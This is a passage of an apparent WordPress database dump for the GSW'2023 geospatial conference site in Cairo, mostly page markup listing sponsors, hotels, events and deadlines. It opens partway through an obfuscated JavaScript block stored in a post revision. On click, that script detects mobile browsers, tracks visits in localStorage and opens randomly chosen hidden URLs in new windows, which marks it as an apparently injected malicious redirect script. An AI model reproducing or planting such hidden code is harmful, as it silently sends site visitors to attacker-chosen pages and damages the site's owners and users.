)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:14:11','2023-07-25 02:14:11','',3066,'https://gsw2023.com/?p=5042',0,'revision','',0),
(5043,1,'2023-07-25 02:15:46','2023-07-25 02:15:46','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251244563{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"300\" height=\"167\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251156587{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><img class=\"alignnone wp-image-5041 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> 